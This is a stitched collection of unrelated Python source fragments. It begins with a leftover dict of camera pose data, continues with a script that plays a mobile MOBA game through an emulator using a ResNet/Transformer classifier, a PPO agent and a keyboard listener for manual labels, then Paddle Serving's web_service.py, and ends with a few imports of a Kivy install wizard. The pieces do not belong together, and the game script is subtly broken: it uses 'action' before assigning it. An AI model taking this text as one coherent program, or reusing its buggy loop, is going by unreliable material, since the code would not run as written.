1: (0.000000,-0.000000,0.000000,-0.000000,0.000000,0.000000,1.000000),
2: (-36.231318,0.539714,9.166994,-0.001044,-0.084696,0.000856,0.996406),
3: (-36.609250,0.547237,9.450094,-0.001060,-0.085936,0.000868,0.996300),
4: (-47.121035,0.794048,21.040113,0.009405,0.762061,-0.007699,0.647391),
5: (-36.095869,0.515842,6.969581,-0.001447,-0.117292,0.001185,0.993096),
},
"office": {
1: (0.000000,-0.000000,0.000000,-0.000000,0.000000,0.000000,1.000000),
2: (-3.447164,-0.009047,0.313643,-0.005836,0.120498,-0.000376,0.992696),
3: (-3.733398,-0.027188,-0.250411,-0.004965,0.999762,-0.020924,0.003740),
4: (-3.595489,-0.017855,-0.024375,-0.004849,0.989799,-0.019389,0.141061),
5: (-3.535968,0.001818,0.856806,0.003445,0.033682,0.000188,0.999427),
6: (0.011558,-0.000710,-0.099917,-0.004612,0.024890,-0.000660,0.999679),
7: (-3.515357,-0.000360,0.679951,-0.008888,0.198771,-0.000162,0.980006),
},
},
"t265_fisheye1": {
"home": {
1: (0.000000,0.000000,0.000000,-0.000000,0.000000,-0.000000,1.000000),
2: (2.053283,0.018268,4.515752,-0.009045,-0.562597,0.006389,0.826657),
3: (-0.757234,0.094409,7.241848,-0.010842,-0.674391,0.007658,0.738255),
4: (-2.429192,0.087896,4.301167,0.007200,0.447822,-0.005085,0.894079),
5: (0.949122,-0.000684,1.283464,0.012804,0.796409,-0.009044,0.604556),
},
"market": {
1: (-0.000000,0.000000,0.000000,-0.000000,0.000000,-0.000000,1.000000),
2: (-0.381144,5.625077,14.669697,-0.000916,0.056177,-0.021565,0.998187),
3: (-0.960520,6.503088,16.981551,0.000350,-0.021470,0.008242,0.999735),
},
"cafe": {
1: (0.000000,0.000000,0.000000,-0.000000,0.000000,-0.000000,1.000000),
2: (-0.583466,0.011070,0.148770,-0.002690,-0.167299,0.001900,0.985901),
},
"corridor": {
1: (0.000000,0.000000,0.000000,-0.000000,0.000000,-0.000000,1.000000),
2: (-36.163584,0.688469,9.427901,-0.001361,-0.084691,0.000962,0.996406),
3: (-36.539423,0.697756,9.713686,-0.001381,-0.085930,0.000976,0.996300),
4: (-46.900735,0.996956,21.392776,0.012252,0.762010,-0.008653,0.647391),
5: (-36.045484,0.661581,7.227184,-0.001886,-0.117284,0.001332,0.993096),
},
"office": {
1: (0.000000,0.000000,0.000000,-0.000000,0.000000,-0.000000,1.000000),
2: (-3.438522,0.004781,0.345892,-0.005380,0.120518,-0.000473,0.992696),
3: (-3.670629,-0.014126,-0.268092,-0.001309,0.999749,-0.022047,0.003740),
4: (-3.526115,-0.004800,-0.033364,-0.001220,0.989788,-0.020501,0.141061),
5: (-3.527940,0.016120,0.885206,0.003575,0.033668,0.000124,0.999427),
6: (0.011991,-0.000619,-0.098661,-0.004522,0.024907,-0.000655,0.999679),
7: (-3.499082,0.014310,0.716282,-0.008131,0.198803,-0.000327,0.980006),
},
},
"t265_fisheye2": {
"home": {
1: (0.000000,0.000000,0.000000,-0.000000,-0.000000,-0.000000,1.000000),
2: (1.981370,0.030678,4.589291,-0.010840,-0.562538,0.008440,0.826657),
3: (-0.865461,0.126201,7.299640,-0.012994,-0.674320,0.010118,0.738255),
4: (-2.484349,0.111377,4.232548,0.008628,0.447776,-0.006718,0.894079),
5: (0.859061,0.001877,1.228348,0.015345,0.796325,-0.011948,0.604556),
},
"market": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,-0.000000,1.000000),
2: (-0.472924,5.676977,14.638771,-0.000760,0.056097,-0.021779,0.998187),
3: (-1.066326,6.567627,16.953535,0.000290,-0.021439,0.008324,0.999735),
},
"cafe": {
1: (0.000000,0.000000,0.000000,-0.000000,-0.000000,-0.000000,1.000000),
2: (-0.588044,0.013818,0.165764,-0.003223,-0.167281,0.002510,0.985901),
},
"corridor": {
1: (0.000000,0.000000,0.000000,-0.000000,-0.000000,-0.000000,1.000000),
2: (-36.226805,0.835882,9.184199,-0.001631,-0.084682,0.001271,0.996406),
3: (-36.604617,0.847412,9.467483,-0.001656,-0.085921,0.001289,0.996300),
4: (-47.119124,1.223038,20.998848,0.014683,0.761931,-0.011432,0.647391),
5: (-36.094352,0.800388,6.988578,-0.002260,-0.117272,0.001760,0.993096),
},
"office": {
1: (0.000000,0.000000,0.000000,-0.000000,-0.000000,-0.000000,1.000000),
2: (-3.442659,0.016500,0.306628,-0.005001,0.120532,-0.000964,0.992696),
3: (-3.796658,-0.003576,-0.294144,0.001956,0.999658,-0.025813,0.003740),
4: (-3.651193,0.005770,-0.075837,0.002003,0.989702,-0.024230,0.141061),
5: (-3.534078,0.030372,0.856267,0.003678,0.033657,0.000022,0.999427),
6: (0.012596,-0.001142,-0.101759,-0.004440,0.024918,-0.000780,0.999679),
7: (-3.508952,0.027483,0.666926,-0.007510,0.198825,-0.001131,0.980006),
},
},
"t265_imu": {
"home": {
1: (0.000000,0.000000,0.000000,0.000000,-0.000000,-0.000000,1.000000),
2: (-1.996198,0.003803,4.548154,0.011874,0.562561,0.004741,0.826657),
3: (0.846974,-0.078926,7.243782,0.014233,0.674347,0.005683,0.738255),
4: (2.480536,-0.088306,4.265572,-0.009452,-0.447793,-0.003774,0.894079),
5: (-0.921339,0.008630,1.283449,-0.016809,-0.796357,-0.006712,0.604556),
},
"market": {
1: (0.000000,-0.000000,0.000000,0.000000,0.000000,-0.000000,1.000000),
2: (0.516480,-5.586881,14.678775,0.000401,-0.056239,-0.021419,0.998187),
3: (1.117126,-6.462140,16.988129,-0.000153,0.021493,0.008186,0.999735),
},
"cafe": {
1: (0.000000,0.000000,0.000000,0.000000,-0.000000,-0.000000,1.000000),
2: (0.585658,-0.013591,0.145843,0.003531,0.167288,0.001410,0.985901),
},
"corridor": {
1: (0.000000,0.000000,0.000000,0.000000,-0.000000,-0.000000,1.000000),
2: (36.262398,-0.841508,9.029932,0.001786,0.084685,0.000714,0.996406),
3: (36.641342,-0.851879,9.311582,0.001814,0.085925,0.000724,0.996300),
4: (47.142230,-1.170879,20.863299,-0.016084,-0.761961,-0.006422,0.647391),
5: (36.120152,-0.819977,6.831279,0.002475,0.117277,0.000988,0.993096),
},
"office": {
1: (0.000000,0.000000,0.000000,0.000000,-0.000000,-0.000000,1.000000),
2: (3.442369,-0.020799,0.305186,0.004783,-0.120544,-0.000201,0.992696),
3: (3.688849,-0.004784,-0.309137,0.003839,0.999799,0.019311,-0.003740),
4: (3.546448,-0.012713,-0.075700,0.003862,0.989833,0.017793,-0.141061),
5: (3.537446,-0.031149,0.845348,-0.003738,-0.033650,0.000256,0.999427),
6: (-0.013075,0.000427,-0.099056,0.004392,-0.024931,-0.000637,0.999679),
7: (3.507507,-0.029618,0.673291,0.007152,-0.198841,0.000130,0.980006),
},
},
"base_link": {
"home": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000),
2: (4.653439,-2.246949,0.000000,0.000000,0.000000,0.562706,0.826657),
3: (7.410862,0.568846,0.000000,0.000000,0.000000,0.674521,0.738255),
4: (4.399963,2.653627,0.000000,0.000000,0.000000,-0.447909,0.894079),
5: (1.633000,-0.754733,0.000000,0.000000,0.000000,-0.796563,0.604556),
},
"market": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000),
2: (15.713963,-0.293285,0.000000,0.000000,0.000000,-0.060181,0.998187),
3: (18.211526,0.017624,0.000000,0.000000,0.000000,0.023000,0.999735),
},
"cafe": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000),
2: (0.142683,0.504664,0.000000,0.000000,0.000000,0.167331,0.985901),
},
"corridor": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000),
2: (9.014827,36.233859,-0.000016,0.000000,-0.000001,0.084707,0.996406),
3: (9.296355,36.612415,-0.000015,0.000000,0.000000,0.085947,0.996300),
4: (21.175313,47.339619,-0.000017,-0.000000,-0.000001,-0.762158,0.647391),
5: (6.816094,36.074646,-0.000017,0.000000,0.000000,0.117307,0.993096),
},
"office": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000),
2: (0.309635,3.500538,0.058010,0.000811,0.007326,-0.120414,0.992696),
3: (0.145258,3.621898,0.064342,0.010893,-0.017257,0.999785,-0.003740),
4: (0.381370,3.543278,0.057061,0.009458,-0.017024,0.989809,-0.141061),
5: (0.853251,3.554253,0.049278,0.000541,-0.003027,-0.033718,0.999427),
6: (-0.105108,-0.001915,0.001637,-0.000429,0.004917,-0.024837,0.999679),
7: (0.690678,3.603368,0.055720,0.001800,0.011347,-0.198638,0.980006),
},
},
}
if __name__ == "__main__":
main()
sys.exit(0)
|
state_anno.py
|
import socket
import json
import sys
import time
import threading
import cv2
import torch
import numpy as np
from utils import combine_states
import torchvision
from resnet_utils import myResnet
from Model_strategy import Agent
from Batch import create_masks
import subprocess
from PyQt5.QtWidgets import QApplication
from PIL import Image, ImageQt
import os
import win32gui
import win32ui
import win32con
from utils import read_json
from utils import MyMNTDevice, 取图
from pynput.keyboard import Key, Listener
from pynput import keyboard
import random
from Model_strategy import Transformer
#window = int(subprocess.check_output(["xdotool", "search" ,"VehiclePhysicsExampleeeveed181"]).decode('ascii').split('\n')[0])
# _DEVICE_ID = '68UDU17B14011947'
_DEVICE_ID = '127.0.0.1:7555' # mumu
# window = "RNE-AL00"
window = "R11"
window = win32gui.FindWindow(0, window)
device = torch.device("cuda:0" if (torch.cuda.is_available()) else "cpu")
mod = torchvision.models.resnet101(pretrained=True).eval().cuda(device).requires_grad_(False)
resnet101 = myResnet(mod)
model_judge_state = Transformer(6, 768, 2, 12, 0.0, 6*6*2048)
model_judge_state.load_state_dict(torch.load('weights/model_weights_判断状态L'))
model_judge_state.cuda(device)
N = 15000  # learn after running N steps
parallel = 100
episode = 3
lr = 0.0003
agent = Agent(act_num=7, parallel_num=parallel,
lr=lr, episode=episode,
input_size=6)
feedback_flag = True
total = 0
tmp_score = 0
tmp_score2 = 0
step = 0
learn_num = 0
allscores = []
allspeeds = []
bestscore = 0
time.sleep(1)
app = QApplication(sys.argv)
screen = app.primaryScreen()
# data_save_dir = '../training_data2'
time_start = 0
add_third_skill = 'd 0 559 1767 100\nc\nu 0\nc\n'
add_sec_skill = 'd 0 443 1562 100\nc\nu 0\nc\n'
add_fst_skill = 'd 0 246 1448 100\nc\nu 0\nc\n'
buy = 'd 0 636 190 100\nc\nu 0\nc\n'
# ope_com_dir="./json/ope_command.json"
# 词数词典路径 = "./json/词_数表.json"
# 数_词表路径 = "./json/数_词表.json"
# 操作查询路径 = "./json/名称_操作.json"
ope_dict = {"img_idx": "0", "move_ope": "无移动", "act_ope": "无动作"}
# if os.path.isfile(词数词典路径) and os.path.isfile(数_词表路径):
# comb_idx, idx_comb = read_json(词数词典路径, 数_词表路径)
# with open(词数词典路径, encoding='utf8') as f:
# 词数词典 = json.load(f)
# with open(操作查询路径, encoding='utf8') as f:
# ope_command_dict = json.load(f)
comb_idx_dir = "./json/comb_idx.json"
idx_comb_dir = "./json/idx_comb.json"
ope_com_dir = "./json/ope_command.json"
comb_idx = read_json(comb_idx_dir)
idx_comb = read_json(idx_comb_dir)
ope_command_dict = read_json(ope_com_dir)
direct_sheet = ['上移', '下移', '左移', '右移', '左上移', '左下移', '右上移', '右下移']
simulator = MyMNTDevice(_DEVICE_ID)
old_command = '移动停'
press1 = False
press2 = False
press3 = False
press4 = False
press5 = False
press6 = False
press7 = False
press8 = False
contflag = True
# need a container to hold the key events
# and to store each event together with the corresponding screenshot
state_dict = {'击杀小兵或野怪或推掉塔': 1, '击杀敌方英雄': 5, '被击塔攻击': -2, '被击杀': -5, '无状况': 0, '死亡': 0, '其它': -0.03, '普通': 0}
# state_dict_A = {'击杀小兵或野怪或推掉塔': 0, '击杀敌方英雄': 1, '被击塔攻击': 2, '被击杀': 3, '无状况': 4, '死亡': 5, '其它': 6, '普通': 7}
state_dict_B = {'击杀小兵或野怪或推掉塔': 0, '击杀敌方英雄': 1, '被击塔攻击': 2, '被击杀': 3, '死亡': 4, '普通': 5}
state = '无状况'
state_list = []
for K in state_dict_B:
state_list.append(K)
def get_key_name(key):
if isinstance(key, keyboard.KeyCode):
return key.char
else:
return str(key)
def on_release(key):
    global press1, press2, press3, press4, press5, press6, press7, press8, state  # declare every press flag global so the resets below take effect
key_name = get_key_name(key)
if key_name == '1':
press1 = False
if key_name == '2':
press2 = False
if key_name == '3':
press3 = False
if key_name == '4':
press4 = False
if key_name == '5':
press5 = False
if key_name == '6':
press6 = False
if key_name == '7':
press7 = False
if key_name == '8':
press8 = False
if key_name == 'Key.page_down':
state = '无状况'
print("已经释放:", key_name)
if key == Key.esc:
        # stop listening
return False
def on_press(key):
global press1, state, contflag
key_name = get_key_name(key)
操作 = ''
if key_name == 'Key.left':
state = '击杀小兵或野怪或推掉塔'
if key_name == 'Key.down':
state = '击杀敌方英雄'
if key_name == 'Key.right':
state = '被击塔攻击'
if key_name == 'Key.up':
state = '被击杀'
if key_name == 'Key.page_down':
state = '其它'
if key_name == 'q':
state = '普通'
if key_name == 'e':
state = '死亡'
if key_name == 'i':
contflag = bool(1 - contflag)
print(state)
def start_listen():
with Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
th = threading.Thread(target=start_listen,)
th.start()
judge_data_dir = '../判断数据样本test'
if not os.path.exists(judge_data_dir):
os.makedirs(judge_data_dir)
imgs_dir = judge_data_dir+'/'
if not os.path.exists(imgs_dir):
os.mkdir(imgs_dir)
for i in range(6666666):
img_tensor = torch.Tensor(0)
ope_seq = np.ones((1, 1))
ope_seq[0] = 128
count = 0
while contflag:
time_start = time.time()
img = screen.grabWindow(window)
image = ImageQt.fromqimage(img)
img_resize = image.resize((960, 480))
#imgA = 取图(窗口名称)
img_array = np.asarray(img_resize)
tmp_tensor = torch.tensor(img_array, device=device)
capture = tmp_tensor.unsqueeze(0).permute(0, 3, 2, 1) / 255
_, out = resnet101(capture)
out = torch.reshape(out, (1, 6*6*2048))
ope_seqA = np.ones((1, 1))
ope_tensorA = torch.tensor(ope_seqA.astype(np.int64)).cuda(device)
src_mask, trg_mask = create_masks(ope_tensorA.unsqueeze(0), ope_tensorA.unsqueeze(0), device)
outA = out.detach()
real_output, _ = model_judge_state(outA.unsqueeze(0), ope_tensorA.unsqueeze(0), trg_mask)
#实际输出=model_判断状态(out, 操作张量.unsqueeze(0),trg_mask)
_, sample = torch.topk(real_output, k=1, dim=-1)
sample_np = sample.cpu().numpy()
if img_tensor.shape[0] == 0:
img_tensor = out
elif img_tensor.shape[0] < 120:
img_tensor = torch.cat((img_tensor, out), 0)
ope_seq = np.append(ope_seq, action)
else:
img_tensor = img_tensor[0:119, :]
ope_seq = ope_seq[0:119]
ope_seq = np.append(ope_seq, action)
img_tensor = torch.cat((img_tensor, out), 0)
ope_seqB = torch.tensor(ope_seq.astype(np.int64)).cuda(device)
# ope_seqB = ope_seq.astype(np.)
# src_mask, trg_mask = create_masks(ope_seq.unsqueeze(0), ope_seq.unsqueeze(0), device)
src_mask, trg_mask = create_masks(ope_seqB.unsqueeze(0), ope_seqB.unsqueeze(0), device)
cur_state = combine_states(img_tensor.cpu().numpy(), ope_seq, trg_mask)
end = False
episode_count = 0
action, action_prob, critic = agent.select_action(cur_state, device, 0)
        # periodically buy items, level up skills 1-3, and stop movement
if count % 50 == 0 and count != 0:
simulator.发送(buy)
simulator.发送(add_third_skill)
simulator.发送(add_sec_skill)
simulator.发送(add_fst_skill)
simulator.发送(ope_command_dict['移动停'])
            print(old_command, 'periodic refresh')
time.sleep(0.02)
simulator.发送(ope_command_dict[old_command])
        # read the chosen action and send it to the device
command = idx_comb[str(action)]
command_set = command.split('_')
if command_set[0] == '无移动':
command_set[0] = '移动停'
if command_set[0] == old_command:
ope_dict['move_ope'] = command_set[0]
ope_dict['act_ope'] = command_set[1]
else:
ope_dict['move_ope'] = command_set[0]
ope_dict['act_ope'] = command_set[1]
old_command = command_set[0]
simulator.发送(ope_command_dict[command_set[0]])
time.sleep(0.01)
if command_set[1] != '无动作' and command_set[1] != '发起集合' and command_set[1] != '发起进攻' and command_set[1] != '发起撤退':
simulator.发送(ope_command_dict[command_set[1]])
#状态辞典={'击杀小兵或野怪或推掉塔': 1, '击杀敌方英雄': 5, '被击塔攻击': -2, '被击杀': -5,'无状况': 0, '死亡': 0, '其它': -0.03,'普通': 0}
if state == '其它' or state == '无状况':
state = state_list[sample_np[0, 0, 0, 0]]
score = state_dict[state]
# or 状况 == '被击塔攻击' or 状况 == '被击杀'
#print(状况, '得分', 得分)
# {'击杀小兵或野怪或推掉塔': 0, '击杀敌方英雄': 1, '被击塔攻击': 2, '被击杀': 3, '死亡': 4, '普通': 5}
if state == '击杀小兵或野怪或推掉塔' or state == '击杀敌方英雄' or state == '被击塔攻击' or state == '被击杀':
            print(state, 'score', score)
        # write the event record to json
if state == '击杀小兵或野怪或推掉塔' or state == '击杀敌方英雄':
event_time = str(int(time.time()*100))
img_resize.save(imgs_dir + event_time+'.jpg')
event_dict = {}
event_dict[event_time] = state
rec_file = open(imgs_dir + '_判断数据.json', 'a+')
json.dump(event_dict, rec_file, ensure_ascii=False)
rec_file.write('\n')
rec_file.close()
elif state == '普通':
            if random.randint(0, 5000) % 100000 == 0:  # very low probability: fires only when randint returns 0 (~1 in 5001)
                print(state, 'score', score)
event_time = str(int(time.time()*100))
img_resize.save(imgs_dir+ event_time+'.jpg')
event_dict = {}
event_dict[event_time] = state
rec_file = open(imgs_dir + '_判断数据.json', 'a+')
json.dump(event_dict, rec_file, ensure_ascii=False)
rec_file.write('\n')
rec_file.close()
elif state == '死亡':
            if random.randint(0, 5000) % 50000 == 0:  # very low probability: fires only when randint returns 0 (~1 in 5001)
                print(state, 'score', score)
event_time = str(int(time.time()*100))
img_resize.save(imgs_dir+event_time+'.jpg')
event_dict = {}
event_dict[event_time] = state
rec_file = open(imgs_dir + '_判断数据.json', 'a+')
json.dump(event_dict, rec_file, ensure_ascii=False)
rec_file.write('\n')
rec_file.close()
if state != '其它':
state = '无状况'
else:
            print("'other' score", score)
cur_state['img_tensor'] = cur_state['img_tensor'][:, -1:, :]
cur_state['ope_seq'] = cur_state['ope_seq'][-1:]
cur_state['trg_mask'] = 0
#智能体.记录数据(状态, 动作, 动作可能性, 评价, 得分, 完结,计数)
time_cost = 0.22 - (time.time() - time_start)
if time_cost > 0:
time.sleep(time_cost)
count = count + 1
if count % 10 == 0:
print('time cost = {}'.format(time_cost))
if contflag is False:
print('learning.............')
# 智能体.学习(device)
print('score', 1)
# 智能体.保存模型(学习次数)
allscores = []
allspeeds = []
print('learning done')
# 智能体.存硬盘('PPO训练数据/'+str(int(time.time())))
# 智能体.保存模型(学习次数)
time.sleep(1)
        print('continue flag', contflag)
# 状态=状态_
# 延迟 = 0.22 - (time.time() - 计时开始)
# if 延迟 > 0:
# time.sleep(延迟)
# 局内计数 = 局内计数 + 1
#
# 分数记录.append(分数)
#
# 平均分 = np.mean(分数记录[-500:])
# 平均速度 = np.mean(速度记录[-15000:])
# if 平均分 > 最高分:
# 最高分 = 平均分
#
# print('步数', 步数, '平均分', 平均分,'最高分',最高分,'局数',i,'平均速度',平均速度)
# time.sleep(2)
# while True:
#
# time.sleep(11)
|
web_service.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!flask/bin/python
# pylint: disable=doc-string-missing
# Now, this is only for Pipeline.
from flask import Flask, request, abort
from contextlib import closing
from multiprocessing import Pool, Process, Queue
from paddle_serving_client import Client
from paddle_serving_server import OpMaker, OpSeqMaker, Server
from paddle_serving_server.serve import start_multi_card
import socket
import sys
import numpy as np
import os
from paddle_serving_server import pipeline
from paddle_serving_server.pipeline import Op
from paddle_serving_server.serve import format_gpu_to_strlist
from paddle_serving_server.util import dump_pid_file
def port_is_available(port):
    # connect_ex returns a non-zero error code when nothing is listening on
    # the port, so a non-zero result means the port is free to bind
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
result = sock.connect_ex(('127.0.0.1', port))
if result != 0:
return True
else:
return False
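# Illustrative sketch (not part of the serving API): scan for a free local
# port with port_is_available, mirroring the loop used in prepare_server below.
def _find_free_port(start=12000, tries=1000):
    for offset in range(tries):
        if port_is_available(start + offset):
            return start + offset
    return None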
class WebService(object):
def __init__(self, name="default_service"):
self.name = name
# pipeline
self._server = pipeline.PipelineServer(self.name)
self.gpus = ["-1"] # deprecated
self.rpc_service_list = [] # deprecated
def get_pipeline_response(self, read_op):
return None
def prepare_pipeline_config(self, yaml_file):
# build dag
read_op = pipeline.RequestOp()
last_op = self.get_pipeline_response(read_op)
if not isinstance(last_op, Op):
raise ValueError("The return value type of `get_pipeline_response` "
"function is not Op type, please check function "
"`get_pipeline_response`.")
response_op = pipeline.ResponseOp(input_ops=[last_op])
self._server.set_response_op(response_op)
self._server.prepare_server(yaml_file)
def run_service(self):
self._server.run_server()
def load_model_config(self,
server_config_dir_paths,
client_config_path=None):
if isinstance(server_config_dir_paths, str):
server_config_dir_paths = [server_config_dir_paths]
elif isinstance(server_config_dir_paths, list):
pass
for single_model_config in server_config_dir_paths:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError(
"The input of --model should be a dir not file.")
self.server_config_dir_paths = server_config_dir_paths
from .proto import general_model_config_pb2 as m_config
import google.protobuf.text_format
file_path_list = []
for single_model_config in self.server_config_dir_paths:
file_path_list.append("{}/serving_server_conf.prototxt".format(
single_model_config))
model_conf = m_config.GeneralModelConfig()
f = open(file_path_list[0], 'r')
model_conf = google.protobuf.text_format.Merge(
str(f.read()), model_conf)
self.feed_vars = {var.alias_name: var for var in model_conf.feed_var}
if len(file_path_list) > 1:
model_conf = m_config.GeneralModelConfig()
f = open(file_path_list[-1], 'r')
model_conf = google.protobuf.text_format.Merge(
str(f.read()), model_conf)
self.fetch_vars = {var.alias_name: var for var in model_conf.fetch_var}
if client_config_path == None:
self.client_config_path = file_path_list
# after this function, self.gpus should be a list of str or [].
def set_gpus(self, gpus):
print("This API will be deprecated later. Please do not use it")
self.gpus = format_gpu_to_strlist(gpus)
    # This function can be called by the user or by create_rpc_config.
    # If called by the user, the user may either call set_gpus beforehand or
    # pass `gpus` directly. When `gpus` is None it was not set at all, so we
    # fall back to self.gpus; otherwise `gpus` takes precedence. In other
    # words, if both set_gpus and `gpus` are used, `gpus` wins.
def default_rpc_service(self,
workdir,
port=9292,
gpus=None,
thread_num=4,
mem_optim=True,
use_lite=False,
use_xpu=False,
ir_optim=False,
precision="fp32",
use_calib=False,
use_trt=False,
gpu_multi_stream=False,
runtime_thread_num=None,
batch_infer_size=None):
device = "cpu"
server = Server()
        # only when `gpus == None` (meaning it was not set at all)
        # do we fall back to self.gpus.
if gpus == None:
gpus = self.gpus
gpus = format_gpu_to_strlist(gpus)
server.set_gpuid(gpus)
if len(gpus) == 0 or gpus == ["-1"]:
if use_lite:
device = "arm"
else:
device = "cpu"
else:
device = "gpu"
op_maker = OpMaker()
op_seq_maker = OpSeqMaker()
read_op = op_maker.create('GeneralReaderOp')
op_seq_maker.add_op(read_op)
for idx, single_model in enumerate(self.server_config_dir_paths):
infer_op_name = "GeneralInferOp"
if len(self.server_config_dir_paths) == 2 and idx == 0:
infer_op_name = "GeneralDetectionOp"
else:
infer_op_name = "GeneralInferOp"
general_infer_op = op_maker.create(infer_op_name)
op_seq_maker.add_op(general_infer_op)
general_response_op = op_maker.create('GeneralResponseOp')
op_seq_maker.add_op(general_response_op)
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(thread_num)
server.set_memory_optimize(mem_optim)
server.set_ir_optimize(ir_optim)
server.set_device(device)
server.set_precision(precision)
server.set_use_calib(use_calib)
if use_trt and device == "gpu":
server.set_trt()
server.set_ir_optimize(True)
if gpu_multi_stream and device == "gpu":
server.set_gpu_multi_stream()
if runtime_thread_num:
server.set_runtime_thread_num(runtime_thread_num)
if batch_infer_size:
server.set_batch_infer_size(batch_infer_size)
if use_lite:
server.set_lite()
if use_xpu:
server.set_xpu()
server.load_model_config(self.server_config_dir_paths
) #brpc Server support server_config_dir_paths
server.prepare_server(workdir=workdir, port=port, device=device)
return server
def _launch_rpc_service(self, service_idx):
self.rpc_service_list[service_idx].run_server()
    # If this function is used, self.gpus must already be set;
    # otherwise the default value self.gpus = ["-1"] is used.
    # Either way we always pass `gpus` = self.gpus.
def create_rpc_config(self):
self.rpc_service_list.append(
self.default_rpc_service(
self.workdir,
self.port_list[0],
self.gpus,
thread_num=self.thread_num,
mem_optim=self.mem_optim,
use_lite=self.use_lite,
use_xpu=self.use_xpu,
ir_optim=self.ir_optim,
precision=self.precision,
use_calib=self.use_calib,
use_trt=self.use_trt,
gpu_multi_stream=self.gpu_multi_stream,
runtime_thread_num=self.runtime_thread_num,
batch_infer_size=self.batch_infer_size))
def prepare_server(self,
workdir,
port=9393,
device="cpu",
precision="fp32",
use_calib=False,
use_lite=False,
use_xpu=False,
ir_optim=False,
thread_num=4,
mem_optim=True,
use_trt=False,
gpu_multi_stream=False,
runtime_thread_num=None,
batch_infer_size=None,
gpuid=None):
print("This API will be deprecated later. Please do not use it")
self.workdir = workdir
self.port = port
self.thread_num = thread_num
# self.device is not used at all.
# device is set by gpuid.
self.precision = precision
self.use_calib = use_calib
self.use_lite = use_lite
self.use_xpu = use_xpu
self.ir_optim = ir_optim
self.mem_optim = mem_optim
self.port_list = []
self.use_trt = use_trt
self.gpu_multi_stream = gpu_multi_stream
self.runtime_thread_num = runtime_thread_num
self.batch_infer_size = batch_infer_size
# record port and pid info for stopping process
dump_pid_file([self.port], "web_service")
# if gpuid != None, we will use gpuid first.
# otherwise, keep the self.gpus unchanged.
# maybe self.gpus is set by the Function set_gpus.
if gpuid != None:
self.gpus = format_gpu_to_strlist(gpuid)
else:
pass
default_port = 12000
for i in range(1000):
if port_is_available(default_port + i):
self.port_list.append(default_port + i)
break
def _launch_web_service(self):
self.client = Client()
self.client.load_client_config(self.client_config_path)
endpoints = ""
endpoints = "127.0.0.1:{}".format(self.port_list[0])
self.client.connect([endpoints])
def get_prediction(self, request):
if not request.json:
abort(400)
if "fetch" not in request.json:
abort(400)
try:
feed, fetch, is_batch = self.preprocess(request.json["feed"],
request.json["fetch"])
if isinstance(feed, dict) and "fetch" in feed:
del feed["fetch"]
if len(feed) == 0:
raise ValueError("empty input")
fetch_map = self.client.predict(
feed=feed, fetch=fetch, batch=is_batch)
result = self.postprocess(
feed=request.json["feed"], fetch=fetch, fetch_map=fetch_map)
result = {"result": result}
except ValueError as err:
result = {"result": str(err)}
return result
def run_rpc_service(self):
print("This API will be deprecated later. Please do not use it")
import socket
localIP = socket.gethostbyname(socket.gethostname())
print("web service address:")
print("http://{}:{}/{}/prediction".format(localIP, self.port,
self.name))
server_pros = []
self.create_rpc_config()
for i, service in enumerate(self.rpc_service_list):
p = Process(target=self._launch_rpc_service, args=(i, ))
server_pros.append(p)
for p in server_pros:
p.start()
app_instance = Flask(__name__)
@app_instance.before_first_request
def init():
self._launch_web_service()
service_name = "/" + self.name + "/prediction"
@app_instance.route(service_name, methods=["POST"])
def run():
return self.get_prediction(request)
self.app_instance = app_instance
# TODO: maybe change another API name: maybe run_local_predictor?
def run_debugger_service(self, gpu=False):
print("This API will be deprecated later. Please do not use it")
import socket
localIP = socket.gethostbyname(socket.gethostname())
print("web service address:")
print("http://{}:{}/{}/prediction".format(localIP, self.port,
self.name))
app_instance = Flask(__name__)
@app_instance.before_first_request
def init():
self._launch_local_predictor(gpu)
service_name = "/" + self.name + "/prediction"
@app_instance.route(service_name, methods=["POST"])
def run():
return self.get_prediction(request)
self.app_instance = app_instance
def _launch_local_predictor(self, gpu):
        # LocalPredictor behaves like a server, but from the WebService's
        # point of view it is the request initiator, i.e. a client.
        # LocalPredictor only supports a single model dir path (str),
        # so the input must be self.server_config_dir_paths[0].
from paddle_serving_app.local_predict import LocalPredictor
self.client = LocalPredictor()
if gpu:
# if user forget to call function `set_gpus` to set self.gpus.
# default self.gpus = [0].
if len(self.gpus) == 0 or self.gpus == ["-1"]:
self.gpus = ["0"]
# right now, local Predictor only support 1 card.
# no matter how many gpu_id is in gpus, we only use the first one.
gpu_id = (self.gpus[0].split(","))[0]
self.client.load_model_config(
self.server_config_dir_paths[0], use_gpu=True, gpu_id=gpu_id)
else:
self.client.load_model_config(
self.server_config_dir_paths[0], use_gpu=False)
def run_web_service(self):
print("This API will be deprecated later. Please do not use it")
self.app_instance.run(host="0.0.0.0", port=self.port, threaded=True)
def get_app_instance(self):
return self.app_instance
def preprocess(self, feed=[], fetch=[]):
print("This API will be deprecated later. Please do not use it")
is_batch = True
feed_dict = {}
for var_name in self.feed_vars.keys():
feed_dict[var_name] = []
for feed_ins in feed:
for key in feed_ins:
feed_dict[key].append(
np.array(feed_ins[key]).reshape(
list(self.feed_vars[key].shape))[np.newaxis, :])
feed = {}
for key in feed_dict:
feed[key] = np.concatenate(feed_dict[key], axis=0)
return feed, fetch, is_batch
def postprocess(self, feed=[], fetch=[], fetch_map=None):
print("This API will be deprecated later. Please do not use it")
for key in fetch_map:
fetch_map[key] = fetch_map[key].tolist()
return fetch_map
|
installwizard.py
|
from functools import partial
import threading
import os
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
